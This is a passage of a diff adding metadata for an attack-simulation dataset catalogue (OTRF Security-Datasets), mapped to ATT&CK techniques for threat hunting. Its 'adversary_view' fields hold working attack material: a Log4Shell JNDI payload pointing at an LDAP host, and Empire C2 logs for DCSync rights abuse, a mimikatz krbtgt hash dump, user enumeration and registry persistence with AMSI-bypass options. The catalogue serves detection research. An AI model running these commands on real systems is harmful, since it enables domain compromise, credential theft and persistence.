+        "description": "The JNDI lookup feature of log4j allows variables to be retrieved via JNDI - Java Naming and Directory Interface. This is an API that that provides naming and directory functionality to Java applications.",
+        "attack_mappings": [
+            {
+                "technique": "T1190",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0001"
+                ]
+            },
+            {
+                "technique": "T1203",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/initial_access/network/log4jshell_reversheshell_netcat.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Microsoft Sentinel To-Go",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "sh",
+                    "module": "sh",
+                    "script": "https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App '${jndi:ldap://192.168.2.6:1389/Run}'"
+        },
+        "references": [
+            "https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120",
+            "https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell",
+            "https://github.com/Cyb3rWard0g/log4jshell-lab"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:23.562332+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190301125905.yaml": {
+        "title": "Empire Powerview Add-DomainObjectAcl",
+        "id": "SDWIN-190301125905",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/01",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "AD Object Modification",
+            "AD Object nTSecurityDescriptor",
+            "LDAP ModifyRequest"
+        ],
+        "description": "This datasets represent adversaries with enough permissions (i.e. domain admin) adding an access control entry (ACE) to the discretionary access control list (DACL) of an Active Directory object (i.e Root Domain). One example could be adversaries modifying the root domain DACL to allow a specific domain user, despite being in no privileged groups and not having local admin rights on the domain controller itself, to use Active Directory replication services and obtain secret domain data (i.e. Other user NTLM Hashes)",
+        "attack_mappings": [
+            {
+                "technique": "T1222",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Active Directory Replication User Backdoor",
+                "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_powerview_ldap_ntsecuritydescriptor.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/network/empire_powerview_ldap_ntsecuritydescriptor.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/windows/shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "powerview",
+                    "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Domain Admin"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\n8BUCWV1P ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2488   5/0.0    2020-09-21 17:09:43  http            \n\n(Empire: agents) > interact 8BUCWV1P\n(Empire: 8BUCWV1P) > scriptimport data/module_source/situational_awareness/network/powerview.ps1\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_IMPORT\n[*] Agent 8BUCWV1P tasked with task ID 1\n(Empire: 8BUCWV1P) > \nscript successfully saved in memory\n\n(Empire: 8BUCWV1P) > scriptcmd Add-DomainObjectAcl -TargetIdentity \"dc=theshire,dc=local\" -TargetDomain theshire.local -PrincipalIdentity nmartha -Rights DCSync\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 2\n(Empire: 8BUCWV1P) > \nJob started: 5WSPKL\n\n(Empire: 8BUCWV1P) > scriptcmd $nmarthaSid = Get-DomainUser nmartha | Select-Object -ExpandProperty objectsid; Get-DomainObjectACL  \"dc=theshire,dc=local\" -Domain theshire.local -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $nmarthaSid}\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 3\n(Empire: 8BUCWV1P) > \nJob started: YG1ZB3\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\nAceQualifier           : AccessAllowed\nObjectDN               : DC=theshire,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : DS-Replication-Get-Changes-All\nObjectSID              : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:23.737334+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190301174830.yaml": {
+        "title": "Empire DCSync",
+        "id": "SDWIN-190301174830",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/01",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "AD Replication services",
+            "RPC DRSUAPI DsGetNCChanges"
+        ],
+        "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "006",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Active Directory Replication From Non-Domain-Controller Accounts",
+                "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "DCSync",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/credentials/Invoke-DCSync.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Domain Admin"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 22:56:58  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > \n(Empire: 1EHYPBVC) > usemodule credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > set user krbtgt\n(Empire: powershell/credentials/mimikatz/dcsync) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > set dc MORDORDC.theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > info\n\n              Name: Invoke-Mimikatz DCsync\n            Module: powershell/credentials/mimikatz/dcsync\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @gentilkiwi\n  Vincent Le Toux\n  @JosephBialek\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract a\n  given account password through Mimikatz's lsadump::dcsync\n  module. This doesn't need code execution on a given DC, but\n  needs to be run from a user context with DA equivalent\n  privileges.\n\nComments:\n  http://blog.gentilkiwi.com http://clymb3r.wordpress.com/\n\nOptions:\n\n  Name   Required    Value                     Description\n  ----   --------    -------                   -----------\n  Agent  True        1EHYPBVC                  Agent to run module on.                 \n  user   True        krbtgt                    Username to extract the hash for        \n                                              (domain\\username format).               \n  domain False       theshire.local            Specified (fqdn) domain to pull for the \n                                              primary domain/DC.                      \n  dc     False       MORDORDC.theshire.local   Specified (fqdn) domain controller to   \n                                              pull replication data from.             \n\n(Empire: powershell/credentials/mimikatz/dcsync) > execute\n[*] Tasked 1EHYPBVC to run TASK_CMD_JOB\n[*] Agent 1EHYPBVC tasked with task ID 1\n[*] Tasked agent 1EHYPBVC to run module powershell/credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > \nJob started: 5PKMSU\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC.theshire.local\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC.theshire.local' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN           : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username         : krbtgt\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration   : \nPassword last change : 9/17/2020 11:14:46 AM\nObject Security ID   : S-1-5-21-4228717743-1032521047-1810997296-502\nObject Relative ID   : 502\n\nCredentials:\n  Hash NTLM: c2547afe54ff225a546c48805714d000\n    ntlm- 0: c2547afe54ff225a546c48805714d000\n    lm  - 0: 376c6c28a8cfd97055be910640a24428\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : a69dcd105b2fc3955a3f52ca00a26902\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : 2954d183aaca51936dea10ea187e198814fa57b136733ca167b5d3fcc5b6ab2a\n      aes128_hmac       (4096) : a8811f9942540c8f10c3837a6975d446\n      des_cbc_md5       (4096) : e36d674cc7c8b983\n\n* Primary:Kerberos *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Credentials\n      des_cbc_md5       : e36d674cc7c8b983\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n    01  774cc07151941eb115c0fd700fa5715b\n    02  6a75ae70376df6a3a3e23f560890ac90\n    03  cd5fa9ee1e6ab120cd6edb6970f56f38\n    04  774cc07151941eb115c0fd700fa5715b\n    05  6a75ae70376df6a3a3e23f560890ac90\n    06  168d6e12549fcbfa3931ffe79e6a978f\n    07  774cc07151941eb115c0fd700fa5715b\n    08  c2fc61fda20bbacb17fb29b10d7b8144\n    09  c2fc61fda20bbacb17fb29b10d7b8144\n    10  2985ad74f9f6f53e7533662687998542\n    11  4f58b2e2f9e8505a4b364b5c7bb0f0c5\n    12  c2fc61fda20bbacb17fb29b10d7b8144\n    13  61c34cf9f0bb6f8062250ffff84cda07\n    14  4f58b2e2f9e8505a4b364b5c7bb0f0c5\n    15  8a1d00b5e9c900715124c0998c19b909\n    16  8a1d00b5e9c900715124c0998c19b909\n    17  da88e05b3fe5adc93f5838eb33fadb98\n    18  45d131a894f854b5400167647aa5ae0f\n    19  2a1e106ba660636a95def3aad248ca6c\n    20  c05fa8a38b50e8c9088d3a64a7659817\n    21  28c03b871631ef39fc8cbc7fbb8e52e8\n    22  28c03b871631ef39fc8cbc7fbb8e52e8\n    23  5e1dceb9c5260211633323b398af827d\n    24  e3b40de14a439d9c18c57cc60002c5f5\n    25  e3b40de14a439d9c18c57cc60002c5f5\n    26  e52cde43b834f641f9f80190b29064a7\n    27  3b2e4b4ad448b19043d422dc9bf4fadc\n    28  0c45e5c4ef958888593d806c650f0e3d\n    29  1822249537162bad7b9808ae6b51c627"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:24.208332+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319020147.yaml": {
+        "title": "Empire Net Local Administrators Group",
+        "id": "SDWIN-190319020147",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Administrators Group Enumeration"
+        ],
+        "description": "This dataset represents adversaries enumerating members of the local Administratrors group via the net.exe utility",
+        "attack_mappings": [
+            {
+                "technique": "T1069",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_localgroup_administrators.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": "net localgroup Administrators"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:18:05  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net localgroup Administrators\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 2\n(Empire: 1EHYPBVC) > \nAlias name     Administrators\nComment        Administrators have complete and unrestricted access to the computer/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nTHESHIRE\\Domain Admins\nwardog\nThe command completed successfully.\n\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:24.381334+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319020729.yaml": {
+        "title": "Empire Net Local Users",
+        "id": "SDWIN-190319020729",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Users Enumeration"
+        ],
+        "description": "This dataset represents adversaries enumerating all local users on an endpoint",
+        "attack_mappings": [
+            {
+                "technique": "T1087",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_local_users.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": "net user"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:25:39  http            \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net user\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 3\n(Empire: 1EHYPBVC) > \nUser accounts for \\\\WORKSTATION5\n\n-------------------------------------------------------------------------------\nDefaultAccount           Guest                    wardog                   \nWDAGUtilityAccount       \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "
+        },
+        "references": [
+            "https://docs.microsoft.com/en-us/windows/win32/netmgmt/user-functions"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:24.555333+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319021158.yaml": {
+        "title": "Empire Net Domain Users",
+        "id": "SDWIN-190319021158",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Domain Users Enumeration",
+            "RPC SAMR EnumDomainUsers"
+        ],
+        "description": "This dataset represents adversaries enumerating all users that belong to a domain via RPC SAMR EnumDomainUsers.",
+        "attack_mappings": [
+            {
+                "technique": "T1087",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_samr_EnumDomainUsers.zip"
+            },
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_samr_EnumDomainUsers.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            \n1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7456   5/0.0    2020-09-21 23:25:39  http            \n\n(Empire: agents) > interact 1EHYPBVC\n\n(Empire: 1EHYPBVC) > shell net user /domain\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 5\n(Empire: 1EHYPBVC) > \nThe request will be processed at a domain controller for domain theshire.local.\n\nUser accounts for \\\\MORDORDC.theshire.local\n\n-------------------------------------------------------------------------------\ndschrute                 Guest                    krbtgt                   \nlrodriguez               mscott                   nmartha                  \npbeesly                  pgustavo                 sbeavers                 \nsysmonsvc                wardog                   \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:24.740332+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319023812.yaml": {
+        "title": "Empire Userland Registry Run Keys",
+        "id": "SDWIN-190319023812",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/04",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Registry Modification",
+            "Registry Run Keys"
+        ],
+        "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. It also captures the execution of the persistence mechanism.",
+        "attack_mappings": [
+            {
+                "technique": "T1547",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0003"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_standard_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "Registry",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"
+                }
+            ],
+            "permissions_required": [
+                "Standard User"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > \n(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:02:57  http            \n\n(Empire: agents) > interact KU86XWEL\n(Empire: KU86XWEL) > \n(Empire: KU86XWEL) > usemodule persistence/\nelevated/registry*                 misc/add_netuser                   misc/install_ssp*                  powerbreach/resolver\nelevated/rid_hijack*               misc/add_sid_history*              misc/memssp*                       userland/backdoor_lnk\nelevated/schtasks*                 misc/debugger*                     misc/skeleton_key*                 userland/registry\nelevated/wmi*                      misc/disable_machine_acct_change*  powerbreach/deaduser               userland/schtasks\nelevated/wmi_updater*              misc/get_ssps                      powerbreach/eventlog*              \n(Empire: KU86XWEL) > usemodule persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > info\n\n              Name: Invoke-Registry\n            Module: powershell/persistence/userland/registry\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n  @enigma0x3\n\nDescription:\n  Persist a stager (or script) via the\n  HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n  key. This has an easy detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        KU86XWEL                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  KeyName          True        Updater                   Key name for the run trigger.           \n  RegPath          False       HKCU:Software\\Microsoft\\  Registry location to store the script   \n                              Windows\\CurrentVersion\\D  code. Last element is the key name.     \n                              ebug                    \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  EventLogID       False                                 Store the script in the Application     \n                                                        event log under the specified EventID.  \n                                                        The ID needs to be unique/rare!         \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/userland/registry) > set Listener http\n(Empire: powershell/persistence/userland/registry) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked KU86XWEL to run TASK_CMD_WAIT\n[*] Agent KU86XWEL tasked with task ID 1\n[*] Tasked agent KU86XWEL to run module powershell/persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > \nRegistry persistence established using listener http stored in HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/userland/registry) > \n(Empire: powershell/persistence/userland/registry) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent SP7B3U2X checked in\n[+] Initial agent SP7B3U2X from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to SP7B3U2X at 172.18.39.5\n\n(Empire: powershell/persistence/userland/registry) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:09:04  http            \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > shell whoami\n[*] Tasked SP7B3U2X to run TASK_SHELL\n[*] Agent SP7B3U2X tasked with task ID 1\n(Empire: SP7B3U2X) > \ntheshire\\pgustavo\n..Command execution completed.\n\n    (Empire: SP7B3U2X) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:24.925332+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319024742.yaml": {
+        "title": "Empire Userland Scheduled Tasks",
+        "id": "SDWIN-190319024742",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Scheduled Tasks"
+        ],
+        "description": "This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.",
+        "attack_mappings": [
+            {
+                "technique": "T1053",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0003"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_standard_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "schtasks",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
